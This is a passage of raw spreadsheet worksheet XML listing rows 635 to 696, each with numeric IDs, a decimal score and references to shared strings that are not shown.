      </c>
      <c r="E635">
        <v>0.99900001287460327</v>
      </c>
      <c r="F635" t="s">
        <v>7</v>
      </c>
      <c r="G635" t="s">
        <v>1255</v>
      </c>
      <c r="H635" t="s">
        <v>844</v>
      </c>
    </row>
    <row r="636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A636" s="1">
        <v>634</v>
      </c>
      <c r="B636">
        <v>4668</v>
      </c>
      <c r="C636">
        <v>4668</v>
      </c>
      <c r="D636">
        <v>0</v>
      </c>
      <c r="E636">
        <v>0.64600002765655518</v>
      </c>
      <c r="F636" t="s">
        <v>7</v>
      </c>
      <c r="G636" t="s">
        <v>1256</v>
      </c>
      <c r="H636" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A637" s="1">
        <v>635</v>
      </c>
      <c r="B637">
        <v>1676</v>
      </c>
      <c r="C637">
        <v>1676</v>
      </c>
      <c r="D637">
        <v>0</v>
      </c>
      <c r="E637">
        <v>0.48059999942779541</v>
      </c>
      <c r="F637" t="s">
        <v>7</v>
      </c>
      <c r="G637" t="s">
        <v>1257</v>
      </c>
      <c r="H637" t="s">
        <v>1258</v>
      </c>
    </row>
    <row r="638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A638" s="1">
        <v>636</v>
      </c>
      <c r="B638">
        <v>1677</v>
      </c>
      <c r="C638">
        <v>1677</v>
      </c>
      <c r="D638">
        <v>0</v>
      </c>
      <c r="E638">
        <v>0.80220001935958862</v>
      </c>
      <c r="F638" t="s">
        <v>7</v>
      </c>
      <c r="G638" t="s">
        <v>1259</v>
      </c>
      <c r="H638" t="s">
        <v>1260</v>
      </c>
    </row>
    <row r="639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A639" s="1">
        <v>637</v>
      </c>
      <c r="B639">
        <v>1678</v>
      </c>
      <c r="C639">
        <v>1678</v>
      </c>
      <c r="D639">
        <v>0</v>
      </c>
      <c r="E639">
        <v>0.99819999933242798</v>
      </c>
      <c r="F639" t="s">
        <v>7</v>
      </c>
      <c r="G639" t="s">
        <v>1261</v>
      </c>
      <c r="H639" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A640" s="1">
        <v>638</v>
      </c>
      <c r="B640">
        <v>1679</v>
      </c>
      <c r="C640">
        <v>1679</v>
      </c>
      <c r="D640">
        <v>0</v>
      </c>
      <c r="E640">
        <v>0.99580001831054688</v>
      </c>
      <c r="F640" t="s">
        <v>7</v>
      </c>
      <c r="G640" t="s">
        <v>1263</v>
      </c>
      <c r="H640" t="s">
        <v>1264</v>
      </c>
    </row>
    <row r="641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A641" s="1">
        <v>639</v>
      </c>
      <c r="B641">
        <v>1680</v>
      </c>
      <c r="C641">
        <v>1680</v>
      </c>
      <c r="D641">
        <v>0</v>
      </c>
      <c r="E641">
        <v>0.99519997835159302</v>
      </c>
      <c r="F641" t="s">
        <v>7</v>
      </c>
      <c r="G641" t="s">
        <v>1265</v>
      </c>
      <c r="H641" t="s">
        <v>1266</v>
      </c>
    </row>
    <row r="642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A642" s="1">
        <v>640</v>
      </c>
      <c r="B642">
        <v>1682</v>
      </c>
      <c r="C642">
        <v>1682</v>
      </c>
      <c r="D642">
        <v>0</v>
      </c>
      <c r="E642">
        <v>0.99830001592636108</v>
      </c>
      <c r="F642" t="s">
        <v>7</v>
      </c>
      <c r="G642" t="s">
        <v>1267</v>
      </c>
      <c r="H642" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A643" s="1">
        <v>641</v>
      </c>
      <c r="B643">
        <v>1683</v>
      </c>
      <c r="C643">
        <v>1683</v>
      </c>
      <c r="D643">
        <v>0</v>
      </c>
      <c r="E643">
        <v>0.9976000189781189</v>
      </c>
      <c r="F643" t="s">
        <v>7</v>
      </c>
      <c r="G643" t="s">
        <v>1269</v>
      </c>
      <c r="H643" t="s">
        <v>1270</v>
      </c>
    </row>
    <row r="644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A644" s="1">
        <v>642</v>
      </c>
      <c r="B644">
        <v>1685</v>
      </c>
      <c r="C644">
        <v>1685</v>
      </c>
      <c r="D644">
        <v>0</v>
      </c>
      <c r="E644">
        <v>0.88340002298355103</v>
      </c>
      <c r="F644" t="s">
        <v>7</v>
      </c>
      <c r="G644" t="s">
        <v>1271</v>
      </c>
      <c r="H644" t="s">
        <v>1272</v>
      </c>
    </row>
    <row r="645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A645" s="1">
        <v>643</v>
      </c>
      <c r="B645">
        <v>1686</v>
      </c>
      <c r="C645">
        <v>1686</v>
      </c>
      <c r="D645">
        <v>0</v>
      </c>
      <c r="E645">
        <v>0.87519997358322144</v>
      </c>
      <c r="F645" t="s">
        <v>7</v>
      </c>
      <c r="G645" t="s">
        <v>1273</v>
      </c>
      <c r="H645" t="s">
        <v>1274</v>
      </c>
    </row>
    <row r="646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A646" s="1">
        <v>644</v>
      </c>
      <c r="B646">
        <v>1712</v>
      </c>
      <c r="C646">
        <v>1712</v>
      </c>
      <c r="D646">
        <v>0</v>
      </c>
      <c r="E646">
        <v>0.48730000853538508</v>
      </c>
      <c r="F646" t="s">
        <v>7</v>
      </c>
      <c r="G646" t="s">
        <v>1275</v>
      </c>
      <c r="H646" t="s">
        <v>1276</v>
      </c>
    </row>
    <row r="647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A647" s="1">
        <v>645</v>
      </c>
      <c r="B647">
        <v>4288</v>
      </c>
      <c r="C647">
        <v>4288</v>
      </c>
      <c r="D647">
        <v>0</v>
      </c>
      <c r="E647">
        <v>0.61650002002716064</v>
      </c>
      <c r="F647" t="s">
        <v>7</v>
      </c>
      <c r="G647" t="s">
        <v>1277</v>
      </c>
      <c r="H647" t="s">
        <v>1278</v>
      </c>
    </row>
    <row r="648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A648" s="1">
        <v>646</v>
      </c>
      <c r="B648">
        <v>6838</v>
      </c>
      <c r="C648">
        <v>6838</v>
      </c>
      <c r="D648">
        <v>0</v>
      </c>
      <c r="E648">
        <v>0.68389999866485596</v>
      </c>
      <c r="F648" t="s">
        <v>7</v>
      </c>
      <c r="G648" t="s">
        <v>1279</v>
      </c>
      <c r="H648" t="s">
        <v>1280</v>
      </c>
    </row>
    <row r="649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A649" s="1">
        <v>647</v>
      </c>
      <c r="B649">
        <v>6107</v>
      </c>
      <c r="C649">
        <v>6107</v>
      </c>
      <c r="D649">
        <v>0</v>
      </c>
      <c r="E649">
        <v>0.63300001621246338</v>
      </c>
      <c r="F649" t="s">
        <v>7</v>
      </c>
      <c r="G649" t="s">
        <v>1281</v>
      </c>
      <c r="H649" t="s">
        <v>1282</v>
      </c>
    </row>
    <row r="650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A650" s="1">
        <v>648</v>
      </c>
      <c r="B650">
        <v>6307</v>
      </c>
      <c r="C650">
        <v>6307</v>
      </c>
      <c r="D650">
        <v>0</v>
      </c>
      <c r="E650">
        <v>0.98900002241134644</v>
      </c>
      <c r="F650" t="s">
        <v>7</v>
      </c>
      <c r="G650" t="s">
        <v>1283</v>
      </c>
      <c r="H650" t="s">
        <v>1284</v>
      </c>
    </row>
    <row r="651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A651" s="1">
        <v>649</v>
      </c>
      <c r="B651">
        <v>3302</v>
      </c>
      <c r="C651">
        <v>3302</v>
      </c>
      <c r="D651">
        <v>0</v>
      </c>
      <c r="E651">
        <v>0.99839997291564941</v>
      </c>
      <c r="F651" t="s">
        <v>7</v>
      </c>
      <c r="G651" t="s">
        <v>1285</v>
      </c>
      <c r="H651" t="s">
        <v>1286</v>
      </c>
    </row>
    <row r="652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A652" s="1">
        <v>650</v>
      </c>
      <c r="B652">
        <v>6308</v>
      </c>
      <c r="C652">
        <v>6308</v>
      </c>
      <c r="D652">
        <v>0</v>
      </c>
      <c r="E652">
        <v>0.95270001888275146</v>
      </c>
      <c r="F652" t="s">
        <v>7</v>
      </c>
      <c r="G652" t="s">
        <v>1287</v>
      </c>
      <c r="H652" t="s">
        <v>1288</v>
      </c>
    </row>
    <row r="653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A653" s="1">
        <v>651</v>
      </c>
      <c r="B653">
        <v>6309</v>
      </c>
      <c r="C653">
        <v>6309</v>
      </c>
      <c r="D653">
        <v>0</v>
      </c>
      <c r="E653">
        <v>0.99849998950958252</v>
      </c>
      <c r="F653" t="s">
        <v>7</v>
      </c>
      <c r="G653" t="s">
        <v>1289</v>
      </c>
      <c r="H653" t="s">
        <v>1290</v>
      </c>
    </row>
    <row r="654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A654" s="1">
        <v>652</v>
      </c>
      <c r="B654">
        <v>6310</v>
      </c>
      <c r="C654">
        <v>6310</v>
      </c>
      <c r="D654">
        <v>0</v>
      </c>
      <c r="E654">
        <v>0.5810999870300293</v>
      </c>
      <c r="F654" t="s">
        <v>7</v>
      </c>
      <c r="G654" t="s">
        <v>1291</v>
      </c>
      <c r="H654" t="s">
        <v>1292</v>
      </c>
    </row>
    <row r="655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A655" s="1">
        <v>653</v>
      </c>
      <c r="B655">
        <v>3311</v>
      </c>
      <c r="C655">
        <v>3311</v>
      </c>
      <c r="D655">
        <v>0</v>
      </c>
      <c r="E655">
        <v>0.68610000610351563</v>
      </c>
      <c r="F655" t="s">
        <v>7</v>
      </c>
      <c r="G655" t="s">
        <v>1293</v>
      </c>
      <c r="H655" t="s">
        <v>1294</v>
      </c>
    </row>
    <row r="656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A656" s="1">
        <v>654</v>
      </c>
      <c r="B656">
        <v>3312</v>
      </c>
      <c r="C656">
        <v>3312</v>
      </c>
      <c r="D656">
        <v>0</v>
      </c>
      <c r="E656">
        <v>0.7215999960899353</v>
      </c>
      <c r="F656" t="s">
        <v>7</v>
      </c>
      <c r="G656" t="s">
        <v>1295</v>
      </c>
      <c r="H656" t="s">
        <v>1296</v>
      </c>
    </row>
    <row r="657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A657" s="1">
        <v>655</v>
      </c>
      <c r="B657">
        <v>6306</v>
      </c>
      <c r="C657">
        <v>6306</v>
      </c>
      <c r="D657">
        <v>0</v>
      </c>
      <c r="E657">
        <v>0.94539999961853027</v>
      </c>
      <c r="F657" t="s">
        <v>7</v>
      </c>
      <c r="G657" t="s">
        <v>1297</v>
      </c>
      <c r="H657" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A658" s="1">
        <v>656</v>
      </c>
      <c r="B658">
        <v>3795</v>
      </c>
      <c r="C658">
        <v>3795</v>
      </c>
      <c r="D658">
        <v>0</v>
      </c>
      <c r="E658">
        <v>0.50880002975463867</v>
      </c>
      <c r="F658" t="s">
        <v>7</v>
      </c>
      <c r="G658" t="s">
        <v>1299</v>
      </c>
      <c r="H658" t="s">
        <v>1300</v>
      </c>
    </row>
    <row r="659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A659" s="1">
        <v>657</v>
      </c>
      <c r="B659">
        <v>3317</v>
      </c>
      <c r="C659">
        <v>3317</v>
      </c>
      <c r="D659">
        <v>0</v>
      </c>
      <c r="E659">
        <v>0.94290000200271606</v>
      </c>
      <c r="F659" t="s">
        <v>7</v>
      </c>
      <c r="G659" t="s">
        <v>1301</v>
      </c>
      <c r="H659" t="s">
        <v>1302</v>
      </c>
    </row>
    <row r="660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A660" s="1">
        <v>658</v>
      </c>
      <c r="B660">
        <v>6311</v>
      </c>
      <c r="C660">
        <v>6311</v>
      </c>
      <c r="D660">
        <v>0</v>
      </c>
      <c r="E660">
        <v>0.99830001592636108</v>
      </c>
      <c r="F660" t="s">
        <v>7</v>
      </c>
      <c r="G660" t="s">
        <v>1303</v>
      </c>
      <c r="H660" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A661" s="1">
        <v>659</v>
      </c>
      <c r="B661">
        <v>3320</v>
      </c>
      <c r="C661">
        <v>3320</v>
      </c>
      <c r="D661">
        <v>0</v>
      </c>
      <c r="E661">
        <v>0.99029999971389771</v>
      </c>
      <c r="F661" t="s">
        <v>7</v>
      </c>
      <c r="G661" t="s">
        <v>1305</v>
      </c>
      <c r="H661" t="s">
        <v>1306</v>
      </c>
    </row>
    <row r="662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A662" s="1">
        <v>660</v>
      </c>
      <c r="B662">
        <v>3790</v>
      </c>
      <c r="C662">
        <v>3790</v>
      </c>
      <c r="D662">
        <v>0</v>
      </c>
      <c r="E662">
        <v>0.86500000953674316</v>
      </c>
      <c r="F662" t="s">
        <v>7</v>
      </c>
      <c r="G662" t="s">
        <v>1307</v>
      </c>
      <c r="H662" t="s">
        <v>1308</v>
      </c>
    </row>
    <row r="663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A663" s="1">
        <v>661</v>
      </c>
      <c r="B663">
        <v>6474</v>
      </c>
      <c r="C663">
        <v>6474</v>
      </c>
      <c r="D663">
        <v>0</v>
      </c>
      <c r="E663">
        <v>0.74879997968673706</v>
      </c>
      <c r="F663" t="s">
        <v>7</v>
      </c>
      <c r="G663" t="s">
        <v>1309</v>
      </c>
      <c r="H663" t="s">
        <v>1310</v>
      </c>
    </row>
    <row r="664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A664" s="1">
        <v>662</v>
      </c>
      <c r="B664">
        <v>3325</v>
      </c>
      <c r="C664">
        <v>3325</v>
      </c>
      <c r="D664">
        <v>0</v>
      </c>
      <c r="E664">
        <v>0.63050001859664917</v>
      </c>
      <c r="F664" t="s">
        <v>7</v>
      </c>
      <c r="G664" t="s">
        <v>1311</v>
      </c>
      <c r="H664" t="s">
        <v>1312</v>
      </c>
    </row>
    <row r="665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A665" s="1">
        <v>663</v>
      </c>
      <c r="B665">
        <v>3787</v>
      </c>
      <c r="C665">
        <v>3787</v>
      </c>
      <c r="D665">
        <v>0</v>
      </c>
      <c r="E665">
        <v>0.50099998712539673</v>
      </c>
      <c r="F665" t="s">
        <v>7</v>
      </c>
      <c r="G665" t="s">
        <v>1313</v>
      </c>
      <c r="H665" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A666" s="1">
        <v>664</v>
      </c>
      <c r="B666">
        <v>3316</v>
      </c>
      <c r="C666">
        <v>3316</v>
      </c>
      <c r="D666">
        <v>0</v>
      </c>
      <c r="E666">
        <v>0.41589999198913569</v>
      </c>
      <c r="F666" t="s">
        <v>7</v>
      </c>
      <c r="G666" t="s">
        <v>1315</v>
      </c>
      <c r="H666" t="s">
        <v>1316</v>
      </c>
    </row>
    <row r="667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A667" s="1">
        <v>665</v>
      </c>
      <c r="B667">
        <v>3329</v>
      </c>
      <c r="C667">
        <v>3329</v>
      </c>
      <c r="D667">
        <v>0</v>
      </c>
      <c r="E667">
        <v>0.9944000244140625</v>
      </c>
      <c r="F667" t="s">
        <v>7</v>
      </c>
      <c r="G667" t="s">
        <v>1317</v>
      </c>
      <c r="H667" t="s">
        <v>1318</v>
      </c>
    </row>
    <row r="668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A668" s="1">
        <v>666</v>
      </c>
      <c r="B668">
        <v>6305</v>
      </c>
      <c r="C668">
        <v>6305</v>
      </c>
      <c r="D668">
        <v>0</v>
      </c>
      <c r="E668">
        <v>0.88419997692108154</v>
      </c>
      <c r="F668" t="s">
        <v>7</v>
      </c>
      <c r="G668" t="s">
        <v>1319</v>
      </c>
      <c r="H668" t="s">
        <v>1320</v>
      </c>
    </row>
    <row r="669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A669" s="1">
        <v>667</v>
      </c>
      <c r="B669">
        <v>3814</v>
      </c>
      <c r="C669">
        <v>3814</v>
      </c>
      <c r="D669">
        <v>0</v>
      </c>
      <c r="E669">
        <v>0.97009998559951782</v>
      </c>
      <c r="F669" t="s">
        <v>7</v>
      </c>
      <c r="G669" t="s">
        <v>1321</v>
      </c>
      <c r="H669" t="s">
        <v>1322</v>
      </c>
    </row>
    <row r="670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A670" s="1">
        <v>668</v>
      </c>
      <c r="B670">
        <v>3266</v>
      </c>
      <c r="C670">
        <v>3266</v>
      </c>
      <c r="D670">
        <v>0</v>
      </c>
      <c r="E670">
        <v>0.72060000896453857</v>
      </c>
      <c r="F670" t="s">
        <v>7</v>
      </c>
      <c r="G670" t="s">
        <v>1323</v>
      </c>
      <c r="H670" t="s">
        <v>1324</v>
      </c>
    </row>
    <row r="671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A671" s="1">
        <v>669</v>
      </c>
      <c r="B671">
        <v>3824</v>
      </c>
      <c r="C671">
        <v>3824</v>
      </c>
      <c r="D671">
        <v>0</v>
      </c>
      <c r="E671">
        <v>0.79089999198913574</v>
      </c>
      <c r="F671" t="s">
        <v>7</v>
      </c>
      <c r="G671" t="s">
        <v>1325</v>
      </c>
      <c r="H671" t="s">
        <v>1326</v>
      </c>
    </row>
    <row r="672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A672" s="1">
        <v>670</v>
      </c>
      <c r="B672">
        <v>3268</v>
      </c>
      <c r="C672">
        <v>3268</v>
      </c>
      <c r="D672">
        <v>0</v>
      </c>
      <c r="E672">
        <v>0.96700000762939453</v>
      </c>
      <c r="F672" t="s">
        <v>7</v>
      </c>
      <c r="G672" t="s">
        <v>1327</v>
      </c>
      <c r="H672" t="s">
        <v>1328</v>
      </c>
    </row>
    <row r="673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A673" s="1">
        <v>671</v>
      </c>
      <c r="B673">
        <v>3270</v>
      </c>
      <c r="C673">
        <v>3270</v>
      </c>
      <c r="D673">
        <v>0</v>
      </c>
      <c r="E673">
        <v>0.7271999716758728</v>
      </c>
      <c r="F673" t="s">
        <v>7</v>
      </c>
      <c r="G673" t="s">
        <v>1329</v>
      </c>
      <c r="H673" t="s">
        <v>1330</v>
      </c>
    </row>
    <row r="674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A674" s="1">
        <v>672</v>
      </c>
      <c r="B674">
        <v>3271</v>
      </c>
      <c r="C674">
        <v>3271</v>
      </c>
      <c r="D674">
        <v>0</v>
      </c>
      <c r="E674">
        <v>0.80199998617172241</v>
      </c>
      <c r="F674" t="s">
        <v>7</v>
      </c>
      <c r="G674" t="s">
        <v>1331</v>
      </c>
      <c r="H674" t="s">
        <v>1332</v>
      </c>
    </row>
    <row r="675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A675" s="1">
        <v>673</v>
      </c>
      <c r="B675">
        <v>3272</v>
      </c>
      <c r="C675">
        <v>3272</v>
      </c>
      <c r="D675">
        <v>0</v>
      </c>
      <c r="E675">
        <v>0.94220000505447388</v>
      </c>
      <c r="F675" t="s">
        <v>7</v>
      </c>
      <c r="G675" t="s">
        <v>1333</v>
      </c>
      <c r="H675" t="s">
        <v>1334</v>
      </c>
    </row>
    <row r="676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A676" s="1">
        <v>674</v>
      </c>
      <c r="B676">
        <v>3273</v>
      </c>
      <c r="C676">
        <v>3273</v>
      </c>
      <c r="D676">
        <v>0</v>
      </c>
      <c r="E676">
        <v>0.89550000429153442</v>
      </c>
      <c r="F676" t="s">
        <v>7</v>
      </c>
      <c r="G676" t="s">
        <v>1335</v>
      </c>
      <c r="H676" t="s">
        <v>1336</v>
      </c>
    </row>
    <row r="677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A677" s="1">
        <v>675</v>
      </c>
      <c r="B677">
        <v>3290</v>
      </c>
      <c r="C677">
        <v>3290</v>
      </c>
      <c r="D677">
        <v>0</v>
      </c>
      <c r="E677">
        <v>0.82050001621246338</v>
      </c>
      <c r="F677" t="s">
        <v>7</v>
      </c>
      <c r="G677" t="s">
        <v>1337</v>
      </c>
      <c r="H677" t="s">
        <v>1338</v>
      </c>
    </row>
    <row r="678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A678" s="1">
        <v>676</v>
      </c>
      <c r="B678">
        <v>6488</v>
      </c>
      <c r="C678">
        <v>6488</v>
      </c>
      <c r="D678">
        <v>0</v>
      </c>
      <c r="E678">
        <v>0.99370002746582031</v>
      </c>
      <c r="F678" t="s">
        <v>7</v>
      </c>
      <c r="G678" t="s">
        <v>1339</v>
      </c>
      <c r="H678" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A679" s="1">
        <v>677</v>
      </c>
      <c r="B679">
        <v>6486</v>
      </c>
      <c r="C679">
        <v>6486</v>
      </c>
      <c r="D679">
        <v>0</v>
      </c>
      <c r="E679">
        <v>0.81559997797012329</v>
      </c>
      <c r="F679" t="s">
        <v>7</v>
      </c>
      <c r="G679" t="s">
        <v>1341</v>
      </c>
      <c r="H679" t="s">
        <v>1342</v>
      </c>
    </row>
    <row r="680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A680" s="1">
        <v>678</v>
      </c>
      <c r="B680">
        <v>3822</v>
      </c>
      <c r="C680">
        <v>3822</v>
      </c>
      <c r="D680">
        <v>0</v>
      </c>
      <c r="E680">
        <v>0.64480000734329224</v>
      </c>
      <c r="F680" t="s">
        <v>7</v>
      </c>
      <c r="G680" t="s">
        <v>1343</v>
      </c>
      <c r="H680" t="s">
        <v>1344</v>
      </c>
    </row>
    <row r="681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A681" s="1">
        <v>679</v>
      </c>
      <c r="B681">
        <v>6485</v>
      </c>
      <c r="C681">
        <v>6485</v>
      </c>
      <c r="D681">
        <v>0</v>
      </c>
      <c r="E681">
        <v>0.99659997224807739</v>
      </c>
      <c r="F681" t="s">
        <v>7</v>
      </c>
      <c r="G681" t="s">
        <v>1345</v>
      </c>
      <c r="H681" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A682" s="1">
        <v>680</v>
      </c>
      <c r="B682">
        <v>6484</v>
      </c>
      <c r="C682">
        <v>6484</v>
      </c>
      <c r="D682">
        <v>0</v>
      </c>
      <c r="E682">
        <v>0.92760002613067627</v>
      </c>
      <c r="F682" t="s">
        <v>7</v>
      </c>
      <c r="G682" t="s">
        <v>1347</v>
      </c>
      <c r="H682" t="s">
        <v>1348</v>
      </c>
    </row>
    <row r="683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A683" s="1">
        <v>681</v>
      </c>
      <c r="B683">
        <v>3821</v>
      </c>
      <c r="C683">
        <v>3821</v>
      </c>
      <c r="D683">
        <v>0</v>
      </c>
      <c r="E683">
        <v>0.84869998693466187</v>
      </c>
      <c r="F683" t="s">
        <v>7</v>
      </c>
      <c r="G683" t="s">
        <v>1349</v>
      </c>
      <c r="H683" t="s">
        <v>1350</v>
      </c>
    </row>
    <row r="684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A684" s="1">
        <v>682</v>
      </c>
      <c r="B684">
        <v>6302</v>
      </c>
      <c r="C684">
        <v>6302</v>
      </c>
      <c r="D684">
        <v>0</v>
      </c>
      <c r="E684">
        <v>0.99879997968673706</v>
      </c>
      <c r="F684" t="s">
        <v>7</v>
      </c>
      <c r="G684" t="s">
        <v>1351</v>
      </c>
      <c r="H684" t="s">
        <v>1352</v>
      </c>
    </row>
    <row r="685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A685" s="1">
        <v>683</v>
      </c>
      <c r="B685">
        <v>6304</v>
      </c>
      <c r="C685">
        <v>6304</v>
      </c>
      <c r="D685">
        <v>0</v>
      </c>
      <c r="E685">
        <v>0.99879997968673706</v>
      </c>
      <c r="F685" t="s">
        <v>7</v>
      </c>
      <c r="G685" t="s">
        <v>1353</v>
      </c>
      <c r="H685" t="s">
        <v>1354</v>
      </c>
    </row>
    <row r="686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A686" s="1">
        <v>684</v>
      </c>
      <c r="B686">
        <v>6301</v>
      </c>
      <c r="C686">
        <v>6301</v>
      </c>
      <c r="D686">
        <v>0</v>
      </c>
      <c r="E686">
        <v>0.99870002269744873</v>
      </c>
      <c r="F686" t="s">
        <v>7</v>
      </c>
      <c r="G686" t="s">
        <v>1355</v>
      </c>
      <c r="H686" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A687" s="1">
        <v>685</v>
      </c>
      <c r="B687">
        <v>3330</v>
      </c>
      <c r="C687">
        <v>3330</v>
      </c>
      <c r="D687">
        <v>0</v>
      </c>
      <c r="E687">
        <v>0.89560002088546753</v>
      </c>
      <c r="F687" t="s">
        <v>7</v>
      </c>
      <c r="G687" t="s">
        <v>1357</v>
      </c>
      <c r="H687" t="s">
        <v>1358</v>
      </c>
    </row>
    <row r="688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A688" s="1">
        <v>686</v>
      </c>
      <c r="B688">
        <v>6312</v>
      </c>
      <c r="C688">
        <v>6312</v>
      </c>
      <c r="D688">
        <v>0</v>
      </c>
      <c r="E688">
        <v>0.89259999990463257</v>
      </c>
      <c r="F688" t="s">
        <v>7</v>
      </c>
      <c r="G688" t="s">
        <v>1359</v>
      </c>
      <c r="H688" t="s">
        <v>1360</v>
      </c>
    </row>
    <row r="689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A689" s="1">
        <v>687</v>
      </c>
      <c r="B689">
        <v>3333</v>
      </c>
      <c r="C689">
        <v>3333</v>
      </c>
      <c r="D689">
        <v>0</v>
      </c>
      <c r="E689">
        <v>0.99379998445510864</v>
      </c>
      <c r="F689" t="s">
        <v>7</v>
      </c>
      <c r="G689" t="s">
        <v>1361</v>
      </c>
      <c r="H689" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A690" s="1">
        <v>688</v>
      </c>
      <c r="B690">
        <v>6318</v>
      </c>
      <c r="C690">
        <v>6318</v>
      </c>
      <c r="D690">
        <v>0</v>
      </c>
      <c r="E690">
        <v>0.73820000886917114</v>
      </c>
      <c r="F690" t="s">
        <v>7</v>
      </c>
      <c r="G690" t="s">
        <v>1363</v>
      </c>
      <c r="H690" t="s">
        <v>1364</v>
      </c>
    </row>
    <row r="691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A691" s="1">
        <v>689</v>
      </c>
      <c r="B691">
        <v>6320</v>
      </c>
      <c r="C691">
        <v>6320</v>
      </c>
      <c r="D691">
        <v>0</v>
      </c>
      <c r="E691">
        <v>0.61870002746582031</v>
      </c>
      <c r="F691" t="s">
        <v>7</v>
      </c>
      <c r="G691" t="s">
        <v>1365</v>
      </c>
      <c r="H691" t="s">
        <v>1366</v>
      </c>
    </row>
    <row r="692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A692" s="1">
        <v>690</v>
      </c>
      <c r="B692">
        <v>6321</v>
      </c>
      <c r="C692">
        <v>6321</v>
      </c>
      <c r="D692">
        <v>0</v>
      </c>
      <c r="E692">
        <v>0.95560002326965332</v>
      </c>
      <c r="F692" t="s">
        <v>7</v>
      </c>
      <c r="G692" t="s">
        <v>1367</v>
      </c>
      <c r="H692" t="s">
        <v>1368</v>
      </c>
    </row>
    <row r="693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A693" s="1">
        <v>691</v>
      </c>
      <c r="B693">
        <v>3766</v>
      </c>
      <c r="C693">
        <v>3766</v>
      </c>
      <c r="D693">
        <v>0</v>
      </c>
      <c r="E693">
        <v>0.67510002851486206</v>
      </c>
      <c r="F693" t="s">
        <v>7</v>
      </c>
      <c r="G693" t="s">
        <v>1369</v>
      </c>
      <c r="H693" t="s">
        <v>1370</v>
      </c>
    </row>
    <row r="694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A694" s="1">
        <v>692</v>
      </c>
      <c r="B694">
        <v>6322</v>
      </c>
      <c r="C694">
        <v>6322</v>
      </c>
      <c r="D694">
        <v>0</v>
      </c>
      <c r="E694">
        <v>0.73240000009536743</v>
      </c>
      <c r="F694" t="s">
        <v>7</v>
      </c>
      <c r="G694" t="s">
        <v>1371</v>
      </c>
      <c r="H694" t="s">
        <v>1372</v>
      </c>
    </row>
    <row r="695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A695" s="1">
        <v>693</v>
      </c>
      <c r="B695">
        <v>6323</v>
      </c>
      <c r="C695">
        <v>6323</v>
      </c>
      <c r="D695">
        <v>0</v>
      </c>
      <c r="E695">
        <v>0.96770000457763672</v>
      </c>
      <c r="F695" t="s">
        <v>7</v>
      </c>
      <c r="G695" t="s">
        <v>1373</v>
      </c>
      <c r="H695" t="s">
        <v>908</v>
      </c>
    </row>
    <row r="696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A696" s="1">
        <v>694</v>
      </c>
      <c r="B696">
        <v>3377</v>
      </c>
      <c r="C696">
        <v>3377</v>
      </c>
      <c r="D696">
